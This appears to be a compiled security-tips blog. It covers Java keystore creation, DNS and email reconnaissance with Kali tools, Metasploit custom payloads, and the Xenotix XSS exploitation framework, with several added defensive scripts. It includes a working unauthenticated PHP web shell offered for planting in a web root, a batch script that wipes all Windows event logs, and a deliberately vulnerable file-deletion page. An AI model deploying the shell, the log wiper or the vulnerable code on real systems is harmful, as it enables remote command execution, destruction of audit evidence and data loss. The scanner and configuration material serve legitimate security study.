How the NSA is tracking people

http://apps.washingtonpost.com/g/page/national/how-the-nsa-is-tracking-people-right-now/634/?tid=sm_fb

Create a Java Certificate

keytool -genkey creates a key pair and a self-signed certificate and stores both in a keystore (-genkeypair is the current name of the same command; -genkey is kept as an alias):

keytool.exe -genkey -keyalg algorithm -alias my_alias -keystore myfilename.jks -storepass my_password -validity my_days -keysize my_size
Options:
 -alias <alias>                  alias name of the entry to process
 -keyalg <keyalg>                key algorithm name
 -keysize <keysize>              key bit size
 -sigalg <sigalg>                signature algorithm name
 -destalias <destalias>          destination alias
 -dname <dname>                  distinguished name
 -startdate <startdate>          certificate validity start date/time
 -ext <value>                    X.509 extension
 -validity <valDays>             validity number of days
 -keypass <arg>                  key password
 -keystore <keystore>            keystore name
 -storepass <arg>                keystore password
 -storetype <storetype>          keystore type
 -providername <providername>    provider name
 -providerclass <providerclass>  provider class name
 -providerarg <arg>              provider argument
 -providerpath <pathlist>        provider classpath
 -v                              verbose output
 -protected                      password through protected mechanism

Example:

keytool.exe -genkey -keyalg RSA -alias myjavacert -keystore mykeystore.jks -storepass 123456qwerty -validity 365 -keysize 2048

Things to fix before using this for anything real: the store password is on the command line, so it lands in shell history and is visible to every local user in the process list while keytool runs (keytool accepts -storepass:env VARNAME and -storepass:file PATH instead). On Java 8 and earlier the default store type is the proprietary JKS format; Java 9 and later default to PKCS12 and print a warning whenever they open a JKS file, so pass -storetype PKCS12 explicitly and the result will not depend on the JDK version. Without -dname the tool prompts interactively for the subject name, and without -ext SAN=dns:hostname the certificate carries no subject alternative name, which modern TLS clients require for hostname matching.
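As an added example (not part of the original post), the same key generation with those caveats applied: PKCS12 store, SHA-256 signature, explicit subject and SAN, and the password taken from the environment. The store path, alias, DN and host name are placeholders supplied by the caller; the second function verifies the entry, which is worth doing for any keystore you did not just watch being created.

```sh
#!/bin/sh
# Added example, not from the original post. Generates an RSA key pair and
# self-signed certificate with keytool using settings a practitioner would
# actually ship, then verifies the entry. Store path, alias, DN and host
# name are placeholders chosen by the caller.

# make_keystore STORE ALIAS DNAME HOST
# The store password is read from $KS_PASS via -storepass:env, so it never
# appears on the command line (shell history, `ps` output). PKCS12 uses one
# password for store and key, hence -keypass:env with the same variable.
make_keystore() {
  store=$1 ks_alias=$2 dname=$3 host=$4
  [ -n "$KS_PASS" ] || { echo "set KS_PASS first" >&2; return 2; }
  keytool -genkeypair \
    -keyalg RSA -keysize 3072 -sigalg SHA256withRSA \
    -alias "$ks_alias" -dname "$dname" \
    -ext "SAN=dns:$host" \
    -validity 365 \
    -storetype PKCS12 -keystore "$store" \
    -storepass:env KS_PASS -keypass:env KS_PASS
}

# list_entry STORE ALIAS
# Prints the entry in verbose form. Exits non-zero if the alias is missing
# or $KS_PASS is wrong, so it doubles as a check that the store is usable.
list_entry() {
  keytool -list -v -storetype PKCS12 -keystore "$1" \
    -storepass:env KS_PASS -alias "$2"
}

# Usage: KS_PASS='...' sh keytool_example.sh out.p12 svc "CN=svc.example.test,O=Example" svc.example.test
if [ $# -eq 4 ]; then
  make_keystore "$@" && list_entry "$1" "$2"
fi
```

The 3072-bit size is a deliberate step up from the 2048 in the post; RSA-2048 is still acceptable today, but a certificate with a one-year validity that gets renewed for years is better started at the larger size.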

A quick and dirty php web shell

Drop it in the web root and call it with ?cmd=id (or any other command). It takes the command from $_REQUEST, so it accepts GET and POST parameters and cookies alike, and it has no authentication: anyone who finds the file can run commands as the web server's user.

<?php
// Quick and dirty: no auth, command echoed back unescaped, output
// streamed straight from system() inside a <pre> block.
if(isset($_REQUEST['cmd'])){
	echo "Command: <span style='color:red;'><b>".$_REQUEST['cmd']."</b></span> executed.";
	echo "<pre style='border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;'>";
	$cmd = $_REQUEST['cmd'];
	system($cmd);   // runs through the system shell; output goes to the response
	echo "</pre>";
	die;
}

Clear All Windows Logs

1) Create a .bat file
2) Append the following:

@echo off
rem Admin check: without elevation bcdedit ends its output with
rem "Access is denied.", so the first token of the last line is "Access".
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
rem "wevtutil el" enumerates every log name; "wevtutil cl" clears one.
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

3) Run as administrator

Caveat: clearing is itself logged. Windows writes event ID 1102 ("The audit log was cleared") to the Security log and event ID 104 ("The System log file was cleared") to the System log, each naming the account that did it, and both are among the first things a SOC alerts on. On a monitored host this script announces itself rather than hiding anything; it is useful for resetting a lab box, not for covering tracks.

PHP Arbitrary File Deletion Vulnerability in Web applications

This one is often filed under "command injection", but no shell command is involved: the bug is an unvalidated file path handed to unlink(), so a request can delete files the script was never meant to touch. Create a new PHP file, name it test_command_injection.php, and save it inside Apache's htdocs directory:

<?php
// Deliberately vulnerable: the path comes straight from the query string
// and is never checked against the directory this script should be
// limited to. "../" sequences and absolute paths are accepted as-is.
if(isset($_GET['filename']))
{
	$filename = $_GET['filename'];
	if(file_exists($filename))
	{
		unlink($filename);
	}
}

Open your favorite browser and open the url: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion

As you can see, you can delete any file the web server's user is allowed to delete (on Unix unlink() needs write permission on the containing directory, not on the file itself) if you provide the right path, including paths outside htdocs via ../ or an absolute path. The fix is not to strip "../" but to resolve the path with realpath() and refuse it unless it lies inside an allow-listed directory, or better, to take an identifier from the request and map it to a file name on the server side.
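Both snippets above (the web shell and the file-deletion page) share one shape: a dangerous sink in the same file as data read straight from a superglobal. Here is an added example, not from the original post, of a triage filter that hunts for that shape across a web root. It lists candidates for manual review; a match proves nothing by itself. Directory and file names are placeholders, and the sample files it writes are constructed.

```sh
#!/bin/sh
# Added example, not from the original post: a triage filter for PHP
# files shaped like the two snippets above, i.e. a dangerous sink
# (system, unlink, eval, ...) in the same file as data read straight
# from a superglobal. It lists candidates for manual review; matching
# proves nothing by itself. Directory and file names are placeholders.

# Portable EREs: no \b or \s, so they also work with BSD grep.
SINKS='(^|[^[:alnum:]_])(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|unlink|file_put_contents|move_uploaded_file)[[:space:]]*\('
INPUTS='\$_(GET|POST|REQUEST|COOKIE|FILES|SERVER)[[:space:]]*\['

# find_suspect_php DIR: print, sorted, every .php file under DIR that
# contains at least one sink call and at least one superglobal read.
find_suspect_php() {
  find "$1" -type f -name '*.php' | while IFS= read -r f; do
    if grep -qE "$SINKS" "$f" && grep -qE "$INPUTS" "$f"; then
      printf '%s\n' "$f"
    fi
  done | sort
}

# make_samples DIR: constructed test files. shell.php and delete.php are
# the two snippets from the post reduced to their essentials; the other
# two are benign look-alikes that a naive "grep for system(" would flag.
make_samples() {
  cat > "$1/shell.php" <<'EOF'
<?php
if (isset($_REQUEST['cmd'])) { $cmd = $_REQUEST['cmd']; system($cmd); }
EOF
  cat > "$1/delete.php" <<'EOF'
<?php
if (isset($_GET['filename']) && file_exists($_GET['filename'])) { unlink($_GET['filename']); }
EOF
  cat > "$1/status.php" <<'EOF'
<?php
// sink with a constant argument, no request data involved
echo '<pre>'; system('uptime'); echo '</pre>';
EOF
  cat > "$1/view.php" <<'EOF'
<?php
// request data, but only echoed through an encoder, no sink
echo htmlspecialchars($_GET['q'] ?? '', ENT_QUOTES, 'UTF-8');
EOF
}

# Usage: sh php_sink_hunt.sh /var/www   (prints candidate files)
if [ $# -eq 1 ]; then
  find_suspect_php "$1"
fi
```

The per-file check is deliberately coarse: it catches the indirect form in the web shell ($cmd assigned first, system($cmd) later) that a single-line regex for system($_REQUEST would miss, at the cost of flagging files where the two never meet. Treat the list as a reading order, not a verdict.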

Dnsrecon – Kali Linux

Open your Kali Linux distribution and a terminal.

Enumerate a domain (an AXFR against each name server is attempted first; if that fails, SOA, NS, A, AAAA, MX and SRV records are queried individually):

dnsrecon -d example.com

Test all NS servers in a domain for misconfigured zone transfers (a server that answers an AXFR from an arbitrary client hands over the whole zone, i.e. every hostname and address in it):

dnsrecon -d example.com -t axfr
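What -t axfr is actually testing, as an added example that is not dnsrecon's code: fetch the zone's NS records and attempt a transfer against each one with dig. The domain name is a placeholder. The only non-obvious part is deciding whether the transfer succeeded, which is done by inspecting dig's output rather than its exit status; the test inputs used to exercise that check are constructed dig transcripts.

```sh
#!/bin/sh
# Added example, not dnsrecon's code: the check behind `dnsrecon -t axfr`
# done by hand with dig. Domain names used here are placeholders.

# ns_servers DOMAIN: the domain's authoritative name servers, one per line.
ns_servers() {
  dig +short NS "$1" | sed 's/\.$//'
}

# axfr_succeeded: reads dig's AXFR output on stdin. A completed transfer is
# a zone listing that starts and ends with the SOA record (so at least two
# SOA lines); a refusal prints "; Transfer failed." instead. dig's exit
# status does not reliably distinguish the two across versions, so the
# text is inspected. Exit 0 means the server handed over the zone.
axfr_succeeded() {
  awk '
    /^; Transfer failed/ { failed = 1 }
    $4 == "SOA"          { soa++ }
    END { exit ((!failed && soa >= 2) ? 0 : 1) }
  '
}

# axfr_check DOMAIN: try AXFR against every NS and print one line per server.
axfr_check() {
  for ns in $(ns_servers "$1"); do
    if dig "@$ns" "$1" AXFR +time=5 +tries=1 2>/dev/null | axfr_succeeded; then
      printf 'VULNERABLE  %s allows zone transfer of %s\n' "$ns" "$1"
    else
      printf 'ok          %s did not transfer the zone\n' "$ns"
    fi
  done
}

# Usage: sh axfr_check.sh example.com
if [ $# -eq 1 ]; then
  axfr_check "$1"
fi
```

Note that "did not transfer" covers both a proper refusal and a server that was unreachable; when auditing, a name server that does not answer on TCP/53 at all deserves a second look, since AXFR requires TCP.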

Help!

Version: 0.8.8
Usage: dnsrecon.py <options>

Options:
   -h, --help                  Show this help message and exit.
   -d, --domain      <domain>  Domain to target for enumeration.
   -r, --range       <range>   IP range for reverse look-up brute force, in the formats
                               (first-last) or (range/bitmask).
   -n, --name_server <name>    Domain server to use; if none is given, the SOA of the
                               target will be used.
   -D, --dictionary  <file>    Dictionary file of sub-domains and hostnames to use for
                               brute force.
   -f                          Filter out of the brute-force domain lookup the records that
                               resolve to the wildcard-defined IP address when saving records.
   -t, --type        <types>   Specify the type of enumeration to perform:
                               std      Enumerate general record types: SOA, NS, A, AAAA,
                                        MX and SRV, if AXFR on the NS servers fails.
                               rvl      Reverse look-up of a given CIDR IP range.
                               brt      Brute force domains and hosts using a given
                                        dictionary.
                               srv      Enumerate common SRV records for a given domain.
                               axfr     Test all NS servers in a domain for misconfigured
                                        zone transfers.
                               goo      Perform a Google search for sub-domains and hosts.
                               snoop    Perform cache snooping against all NS servers for a
                                        given domain, testing all domains in the file given
                                        with the -D option.
                               tld      Remove the TLD of the given domain and test against
                                        all TLDs registered with IANA.
                               zonewalk Perform a DNSSEC zone walk using NSEC records.
   -a                          Perform AXFR with the standard enumeration.
   -s                          Perform reverse look-up of IPv4 ranges in the SPF record of the
                               targeted domain with the standard enumeration.
   -g                          Perform Google enumeration with the standard enumeration.
   -w                          Do deep whois record analysis and reverse look-up of IP
                               ranges found through whois when doing the standard query.
   -z                          Perform a DNSSEC zone walk with the standard enumeration.
   --threads          <number> Number of threads to use in range reverse look-up, forward
                               look-up brute force and SRV record enumeration.
   --lifetime         <number> Time to wait for a server to respond to a query.
   --db               <file>   SQLite 3 file to save found records.
   --xml              <file>   XML file to save found records.
   --iw                        Continue brute-forcing a domain even if a wildcard record
                               resolution is discovered.
   -c, --csv          <file>   Comma-separated value file to save found records.
   -j, --json         <file>   JSON file to save found records.
   -v                          Show attempts in the brute-force modes.

Collect emails using kali linux

> Run your Kali Linux
> Open a terminal
> Type:

theharvester -d mydomain.com -b all

> Hit enter and wait for results.

-b all queries every search engine and data source the tool supports, which is slow and noisy; naming a single source (-b google, -b bing, -b linkedin) narrows it, and -l caps the number of results taken from each source. The output also lists hostnames found along the way, not only email addresses.

How to generate shellcode from custom exe in metasploit

Metasploit's generic/custom payload lets you push your own bytes, from a file or a string, through the framework's generator, encoders and output formats, which is how you get them into the shape a document or Excel carrier expects. One caveat before the steps: the module copies the bytes verbatim. A PE executable given as PAYLOADFILE comes out as the same PE, not as position-independent shellcode, so for the "convert my exe to shellcode" use case the file must already contain raw shellcode (or be wrapped by a separate PE-to-shellcode loader first); otherwise the result crashes when injected. To accomplish this:

1> Run Kali Linux

2> Open a terminal window

3> Type

msfconsole

and hit enter

4> Type

use payload/generic/custom

and hit enter

5> Choose your custom payload file:

set PAYLOADFILE /root/Desktop/mycustomexe.exe

6> Alternatively, give the payload bytes inline instead of from a file. PAYLOADSTR is not a name or title: the string itself becomes the payload, so the value below would simply emit the ASCII text mycustomexe. Set one of PAYLOADFILE and PAYLOADSTR, not both:

set PAYLOADSTR mycustomexe

7> Type

generate

and hit enter. Add an output format to get something you can paste, e.g. generate -f c for a C array; run generate -h first, because the flag letters for output format and output file changed between Metasploit versions.
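An added example, not Metasploit's code, that automates the one check the caveat above calls for: it verifies that PAYLOADFILE holds raw shellcode rather than a PE image before handing it to generic/custom through msfvenom, which takes the same PAYLOADFILE option on its command line. File names are placeholders and the sample bytes are constructed.

```sh
#!/bin/sh
# Added example, not Metasploit's code. generic/custom copies PAYLOADFILE
# byte for byte, so the one check worth automating is "is this actually
# shellcode, or a PE executable someone hoped would be converted?".
# File names are placeholders; the sample bytes are constructed.

# is_pe FILE: true when the file starts with the "MZ" DOS header that
# every PE executable carries.
is_pe() {
  [ "$(dd if="$1" bs=2 count=1 2>/dev/null)" = "MZ" ]
}

# custom_payload FILE [FORMAT]: refuse PE images, otherwise wrap the raw
# shellcode in FILE with generic/custom and emit it in FORMAT (c by
# default; raw, python, ... also work). Returns 2 for a PE image and 3
# when msfvenom is not installed.
custom_payload() {
  file=$1 fmt=${2:-c}
  if is_pe "$file"; then
    echo "$file is a PE executable, not shellcode; generic/custom would only copy its bytes" >&2
    return 2
  fi
  command -v msfvenom >/dev/null 2>&1 || { echo "msfvenom not found" >&2; return 3; }
  msfvenom -p generic/custom PAYLOADFILE="$file" -f "$fmt"
}

# make_samples DIR: constructed inputs. program.exe is just the MZ magic
# plus a NOP; stub.bin is three bytes of x86 (xor eax,eax; ret) standing
# in for real position-independent shellcode.
make_samples() {
  printf 'MZ\220' > "$1/program.exe"
  printf '\061\300\303' > "$1/stub.bin"
}

# Usage: sh custom_payload.sh shellcode.bin c
if [ $# -ge 1 ]; then
  custom_payload "$@"
fi
```

The MZ check is intentionally cheap; it exists to stop the common mistake early, not to classify files. Anything that passes still has to be real position-independent code for the injected result to run.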
OWASP Xenotix XSS Exploit Framework

OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It claims zero-false-positive scan results because payloads are executed in three embedded browser engines (Trident, WebKit and Gecko) rather than matched by pattern, so a finding means the script actually ran in a real engine. The project describes its payload list, about 1500 distinct XSS payloads, as the second largest in the world, aimed at both detection and WAF bypass. It ships with an information-gathering module for target reconnaissance, and its exploitation modules go well beyond proof of concept, several of them being persistent Firefox add-ons.

SCANNER MODULES

  • Manual Mode Scanner
  • Auto Mode Scanner
  • DOM Scanner
  • Multiple Parameter Scanner
  • POST Request Scanner
  • Header Scanner
  • Fuzzer
  • Hidden Parameter Detector

INFORMATION GATHERING MODULES

  • WAF Fingerprinting
  • Victim Fingerprinting
  • Browser Fingerprinting
  • Browser Features Detector
  • Ping Scan
  • Port Scan
  • Internal Network Scan

EXPLOITATION MODULES

  • Send Message
  • Cookie Thief
  • Phisher
  • Tabnabbing
  • Keylogger
  • HTML5 DDoSer
  • Load File
  • Executable Drive By
  • JavaScript Shell
  • Reverse HTTP WebShell
  • Drive-By Reverse Shell
  • Metasploit Browser Exploit
  • Firefox Reverse Shell Addon (Persistent)
  • Firefox Session Stealer Addon (Persistent)
  • Firefox Keylogger Addon (Persistent)
  • Firefox DDoSer Addon (Persistent)
  • Firefox Linux Credential File Stealer Addon (Persistent)
  • Firefox Download and Execute Addon (Persistent)

UTILITY MODULES

  • WebKit Developer Tools
  • Payload Encoder
  • JavaScript Beautify
  • Hash Calculator
  • Hash Detector

Download

Defeat web trackers

Ghostery sees the “invisible” web, detecting trackers, web bugs, pixels, and beacons placed on web pages by Facebook, Google Analytics, and over 1,000 other ad networks, behavioral data providers, web publishers – all companies interested in your activity. After showing you who operates behind the scenes, Ghostery also gives you the opportunity to learn more about each company it identifies, including links to their privacy policy and opt-out options. Ghostery allows you to block scripts from companies that you don’t trust, delete local shared objects, and even block images and iframes.

Download for Firefox